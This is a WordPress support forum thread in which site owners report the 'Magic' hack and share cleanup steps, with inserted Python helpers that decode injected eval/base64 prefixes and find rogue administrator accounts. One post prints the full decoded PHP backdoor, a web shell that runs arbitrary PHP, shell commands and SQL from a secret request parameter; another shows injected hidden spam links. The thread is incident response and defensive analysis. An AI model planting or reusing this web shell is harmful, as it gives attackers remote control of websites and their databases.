
Editing triggers popup asking for username and password - security breach? (83 posts)

  1. captainhendry
    Member
    Posted 2 years ago #

    Hey, I just got hit with this in the last couple hours. Blog was fine this morning. Suddenly I get the pop-up on every post. Popup said "Server says Magic" or something like that.

    FYI, I was running 2.8.2 on Bluehost. Using Akismet for spam. I also approve every comment by a new author.

    Checked FTP for recently added files and found one under WP-Admin called wp-rss.php. I still have the file. It's a long string of Hex code. If anyone wants a look, let me know and I'll e-mail it to you.

    Anyway, I deleted it but still had the problem. Installed 2.8.3, changed my password and everything seems fine now.

    This is the third time I've been hacked this summer. Anyone know how they're getting these files on my host? This is really getting old.

    Also, just checked and nearly every one of my plugins had the hex code added up front. Anyone know where that came from?

  2. David Tufts
    Member
    Posted 2 years ago #

    We noticed that the code injected into the files was run through an eval and a decode, so we decoded the string and found this PHP code:

    {
        if (!function_exists('______safeshell'))
        {
            // Runs a supplied command through whichever execution function
            // the host has left enabled, after trying to lift safe_mode/open_basedir.
            function ______safeshell($komut) {
                @ini_restore("safe_mode");
                @ini_restore("open_basedir");
                $disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));
                if (!empty ($komut)) {
                    if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {
                        //@ ob_start();
                        @ passthru($komut);
                        //$res = @ ob_get_contents();
                        //@ ob_end_clean();
                    }
                    elseif (function_exists('system') && !in_array('system', $disable_functions)) {
                        //@ ob_start();
                        @ system($komut);
                        //$res = @ ob_get_contents();
                        //@ ob_end_clean();
                    }
                    elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {
                        $res = @ shell_exec($komut);
                        echo $res;
                    }
                    elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {
                        @ exec($komut, $res);
                        $res = join("\n", $res);
                        echo $res, "\n";
                    }
                    elseif (@ is_resource($f = @ popen($komut, "r"))) {
                        //$res = "";
                        while (!@ feof($f)) {
                            //$res .= @ fread($f, 1024);
                            echo(@ fread($f, 1024));
                        }
                        @ pclose($f);
                    }
                    else
                    {
                        $res = {$komut};  // last-resort fallback; this line is garbled in the posted copy
                        echo $res;
                    }
                }
            }
        };

        // Entry point: nothing happens unless the request carries this parameter,
        // which is why normal page views look unaffected.
        if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {
            echo "<php_bdb7e9f039f4c7d9100073e131610a87_result>\n";
            if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {
                // 'eval' mode: arbitrary PHP taken from the cmd parameter
                eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
            }
            else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {
                // 'exec' mode: shell command via the function above
                ______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
            }
            else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {
                // 'query' mode: arbitrary SQL over WordPress's own database connection
                $result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);
                if (!$result)
                {
                    echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";
                    die();
                }
                else if (is_resource($result))
                {
                    $res = array();
                    while ($row = mysql_fetch_assoc($result))
                    {
                        $res[] = $row;
                    };
                    mysql_free_result($result);
                    echo serialize($res);
                    die();
                }
                else
                {
                    echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";
                    die();
                }
            };
            echo "\n</php_bdb7e9f039f4c7d9100073e131610a87_result>\n";
            die();
        };
    };

  3. streetdaddy
    Member
    Posted 2 years ago #

    Anyone feel like explaining exactly what this is attempting to do? At a glance it looks like it is probing for a vulnerability either in the server configuration or WordPress itself?

  4. danceadvantage
    Member
    Posted 2 years ago #

    Is this a coincidence... or not?

    Today I went to bluehost cpanel and logged into my email (webmail) account there. I wanted to check some things and also change my password. I was confronted with another alert message -- A username and password are being requested by https://boxxxx.bluehost.com:xxxx. The site says: "WebMail" --

    Recognizing that this was exactly like the Magic thing, I kept hitting cancel until it went away. So, who do I alert about this? Did it happen BECAUSE I experienced the Magic problem?

    My vars.php code looks clean, by the way. And no further problems with magic since I updated and cleaned the plugins (though I did notice some foreign code in my footer this week, which I removed). Where else do I need to look for malicious code? Any thoughts or suggestions?

  5. danceadvantage
    Member
    Posted 2 years ago #

    I just checked my footer.php again and more code had been inserted. This is just a sampling -

    <p style="display: none"> <a href="http://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=adobe-presenter-for-mac">adobe presenter for mac</a>
    <a href="http://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=acala-dvd-creator-3">acala dvd creator 3 download</a>
    <a href="http://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=xilisoft-1click-dv-to-dvd">xilisoft 1click dv to dvd download</a>
    <a href="http://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=futuremark-pcmark-vantage-advanced">futuremark pcmark vantage advanced</a>
    <a href="http://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=xilisoft-video-converter-ultimate-5-1">xilisoft video converter ultimate 5.1</a>
    <a href="http://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=roxio-copy---convert-3">download roxio copy & convert 3</a>

    Where is it coming from and how can I get rid of it? Help please!

  6. missjudy84
    Member
    Posted 2 years ago #

    I encountered this same problem yesterday. This is what I had to do to get it fixed:

    First I searched all .php files of my plugins (wp-content/plugins) and found some files starting with "<?php eval(gzinflate(base64_decode('1VVtT9swEP7c/gpTVSSRurEhoECB.... ?>", so I removed that from all the files and then updated the plugins, but it was still not working correctly. So this time I backed up my db and WordPress files and did the update right from the admin control panel, and everything is working great.
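The encoded prefix missjudy84 describes is the same eval/decode wrapper David Tufts unpacked in post 2. The following Python script is an added example (not code from the thread) that finds that prefix in a plugin tree and reverses base64_decode() + gzinflate() statically, so the hidden code can be read without ever being executed; the sample plugin file it scans is constructed, with a harmless stand-in payload.

```python
import base64
import os
import re
import zlib

# The prefix reported at the top of infected plugin files:
#   <?php eval(gzinflate(base64_decode('...'))); ?>
INJECT_RE = re.compile(
    rb"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*\)"
)


def decode_payload(b64: bytes) -> bytes:
    """Reverse base64_decode() + gzinflate() statically; nothing is executed."""
    # PHP's gzinflate() is raw DEFLATE, which zlib selects with a negative wbits.
    return zlib.decompress(base64.b64decode(b64), -zlib.MAX_WBITS)


def scan_file(path: str) -> list:
    """Return the decoded payload of every injected eval() block in one file."""
    with open(path, "rb") as fh:
        data = fh.read()
    return [decode_payload(m.group(1)) for m in INJECT_RE.finditer(data)]


def scan_tree(root: str) -> dict:
    """Walk a plugins/ or wp-includes/ tree; map each infected .php path to its payloads."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                payloads = scan_file(path)
                if payloads:
                    hits[path] = payloads
    return hits


def make_sample_plugin(directory: str) -> str:
    """Constructed sample (not real malware): a plugin file carrying an encoded prefix."""
    hidden = b"<?php /* constructed stand-in for the injected code */ ?>"
    deflater = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)  # raw DEFLATE, as gzdeflate() emits
    encoded = base64.b64encode(deflater.compress(hidden) + deflater.flush())
    os.makedirs(directory, exist_ok=True)
    path = os.path.join(directory, "hello.php")
    with open(path, "wb") as fh:
        fh.write(b"<?php eval(gzinflate(base64_decode('" + encoded + b"'))); ?>\n")
        fh.write(b"<?php // legitimate plugin code would follow here\n")
    return path
```

Point scan_tree() at a copy of wp-content/plugins (and wp-includes, where vars.php lives) and review each decoded payload before deleting the prefix; the clean file is everything after the closing `?>` of the injected block.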

  7. danceadvantage
    Member
    Posted 2 years ago #

    I removed foreign code from my plugins, changed passwords, and updated. This solved the problem of the authentication box appearing. However, later I discovered the above code and it is still appearing in my footer php. I have removed it and it returns within a couple of days. Is anyone else having this problem? I am not sure how or where the additional code is generating from. I would like to update to 2.8.4 but wanted to wait and see if I could find the culprit code that is infecting the footer since the update I did last time obviously did not completely cure the problem.

  8. bh_WP_fan
    Member
    Posted 2 years ago #

    danceadvantage, when it requests a username and password at box#.bluehost.com for webmail, that means that it no longer has the session authenticated and you need to log in again. It is normal and not the result of a hack.

    As to the current problems you are having, they are definitely the result of a hack. The first thing to do is to rename your plugins directory and change your theme to the default theme for the time being. If there are security issues through either of these, it will help to prevent the inserted code from reappearing.

    After doing that, you should upload all of the WordPress core files from the current version of WordPress you are running over the top of the existing core files. If there are core files which have been hacked, this will put the correct code back up. Simply upgrading will also help with this oftentimes.

    Read the sticky about the gooooogle hack and see if it applies to you.
    Then you need to work on getting your site more secure. Make sure to only choose more recent versions of plugins. Don't pick a plugin that hasn't been tested to work with WordPress 2.8.x since a considerably older version of BlueHost. Find a theme that is also a more recent/updated theme.

    Browse the forums for suggestions on securing your site.
    Read the following:
    http://codex.wordpress.org/Hardening_WordPress
    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
    http://guvnr.com/web/blogging/10-tips-to-make-wordpress-hack-proof/
    http://wordpress.org/support/topic/281767?replies=19

  9. tgmcduff
    Member
    Posted 2 years ago #

    Reuploading my original vars.php file seems to have solved the "Magic" problem. Comparing the dates and file sizes of other files with those on my local machine, I discovered that my .htaccess file had a different date 7/30/09. I know I didn't change it and no one else works on my site, so I replaced it with my original, too. So far, so good.

    In hindsight, I probably should have downloaded it to look at and see what had been added/changed: it's only a text file after all.

    Anybody else have their .htaccess file changed by this Trojan?

    I'm still not clear how it got in. I don't allow comments unless they've been approved: too much spam.

  10. williscreative
    Member
    Posted 2 years ago #

    bh_WP_fan,

    Where is “sticky about the gooooogle hack”, as you say above?

  11. bh_WP_fan
    Member
    Posted 2 years ago #

  12. yokima
    Member
    Posted 2 years ago #

    This incident looks similar to what's being discussed in this thread: http://mashable.com/2009/09/05/wordpress-attack/ Maybe it's the same issue?

  13. martymankins
    Member
    Posted 2 years ago #

    Got hit with the "Magic" hack recently on one of my blogs. I was running 2.8.2 at the time.

    Cleaned up all the code, replaced the vars.php file from a backup and then did a complete backup once I was sure all of the hacked code was gone from all plugins and elsewhere.

    Now at 2.8.4, but wondering like the others here, if this will provide safety from this same hack.

    Thanks go out to yokima and others who figured out how to get rid of this.

  14. techartist
    Member
    Posted 2 years ago #

    1. Re-uploaded wp-includes/vars.php from backed up copy. "Magic" authentication stopped.
    2. Changed all admin passwords.
    3. Upgraded site to latest version.
    4. Examined plugins for malicious code. Found one file infected and removed the code.
    5. Backed up all files in case of next attack.

  15. natarem
    Member
    Posted 2 years ago #

    Has anyone decoded the code to see what it looks like?

  16. exalkonium
    Member
    Posted 2 years ago #

    Guys, I just experienced this, and thought about the users with access when I stumbled upon this:

    When I would click on users with Administrator access, the indicator only showed (1), but when I clicked on the authors, the Administrator access indicator showed (2). It would go back and forth. So I decided to go into the database.

    I went into the wp_usermeta table and searched for all records where the meta_key was like wp_user_level. Sure enough, 2 records popped up where the wp_user_level was 10 (Administrator access): mine and one that was never there before!

    So I grabbed the user_id from that, looked in the wp_users table, and searched for the user where the id was the same as it was in the other table. The record that came up was a person I never heard of, and was there WITHOUT an email address listed in the database. This obviously is not right. You all might want to check your databases for extra users in there that shouldn't have administrator access, because I think this exploit places it in there. If you backed up your databases and re-imported them, you will just end up reimporting the same user back into WordPress!

    Here are the details of the user that I found:
    umeta_id = 593
    user_id = 106
    meta_key = wp_user_level
    meta_value = 10
    name = JohnathonTownsend73
    password = $P$BZnYFY8XjH5w8yS.Div59Op0c/2AQA0
    userid = johnathontownsend73
    joindate = 2009-09-05 08:53:47
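The rogue-administrator check exalkonium walks through, as an added Python example (not code from the thread): the SELECT joins wp_usermeta to wp_users exactly as described, and the rows it runs on are constructed sample data using the default wp_ table prefix, not any real site's users.

```python
import sqlite3

# The check exalkonium describes: an administrator is a user whose wp_usermeta row
# '<table prefix>user_level' is 10. The thread's site uses the default 'wp_' prefix.
ADMIN_QUERY = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users AS u
JOIN wp_usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_user_level' AND m.meta_value = '10'
ORDER BY u.ID
"""


def load_constructed_db() -> sqlite3.Connection:
    """Constructed rows mirroring the two WordPress tables (not data from any real site)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT,
                               user_email TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
        INSERT INTO wp_users VALUES (1, 'siteowner', 'owner@example.com', '2008-01-10 12:00:00');
        INSERT INTO wp_users VALUES (7, 'guestauthor', 'guest@example.com', '2009-03-02 09:15:00');
        INSERT INTO wp_users VALUES (106, 'rogue73', '', '2009-09-05 08:53:47');
        INSERT INTO wp_usermeta VALUES (1, 1, 'wp_user_level', '10');
        INSERT INTO wp_usermeta VALUES (2, 7, 'wp_user_level', '2');
        INSERT INTO wp_usermeta VALUES (3, 106, 'wp_user_level', '10');
    """)
    return con


def find_admins(con: sqlite3.Connection, known_admin_logins) -> list:
    """List every level-10 account and say why it looks suspicious, if it does.

    A planted account is typically one the owner never created and, as in the
    thread, has no e-mail address at all.
    """
    findings = []
    for uid, login, email, registered in con.execute(ADMIN_QUERY):
        reasons = []
        if login not in known_admin_logins:
            reasons.append("not a known administrator")
        if not email:
            reasons.append("no e-mail address")
        findings.append({"ID": uid, "login": login, "registered": registered,
                         "suspicious": reasons})
    return findings
```

The SELECT is plain SQL and can be pasted as-is into phpMyAdmin against the live MySQL database; because the account lives in the database, a backup taken after the compromise will carry it back in, which is why the check belongs after every restore.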

  17. natarem
    Member
    Posted 2 years ago #

    I found the same thing but two accounts, thanks for the tip.

  18. natarem
    Member
    Posted 2 years ago #

    Also, now I see above the decoded php. Sorry I missed it the first time through.

  19. glcaff
    Member
    Posted 2 years ago #

    Fixed! Running WP 2.8 and had the same problem. Re-uploaded wp-includes/vars.php and it's working again. Thanks for the help!

  20. Celine Kiernan
    Member
    Posted 2 years ago #

    Hi guys, I found 4 other authors on my users with access and it says that there are 2 administrators but I can only see one. I have NO CLUE how to do any of the stuff you guys are talking about (exalkonium, I don't even know how to find the database that you're searching) so I'm completely stumped. I tried to update my WordPress but it's asking me my host, username and password and accepting none of them. Someone help a complete net/computer moron fix this?

  21. deperechamber
    Member
    Posted 2 years ago #

    I've searched my plugins and my var.php file and I don't have any of the code. I'm using 2.8.4.

    I get the user authentication request when trying to set up links inside a post.

  22. roadsidephil
    Member
    Posted 2 years ago #

    I've had the same problem today. I found the malicious code in one of my plugins and removed it. Also found it in the vars.php and removed it.

    I'm using version 2.8.2.

    Now two other things are happening. When I post a new entry from the main edit window, the resulting page is just a blank white one. The entry does post though. Same thing if updating an entry. Doesn't seem to do it from the quick edit page.

    Also, I wanted to upgrade to 2.8.6. When I click Upgrade Automatically it just says it's downloading the files but doesn't go any farther.

  23. derek23
    Member
    Posted 2 years ago #

    Hi

    This has just hit me as well and I really haven't got a clue what to do, I'm not a techie.

    Can someone talk me through this in English please?

    Derek

Topic Closed

This topic has been closed to new replies.
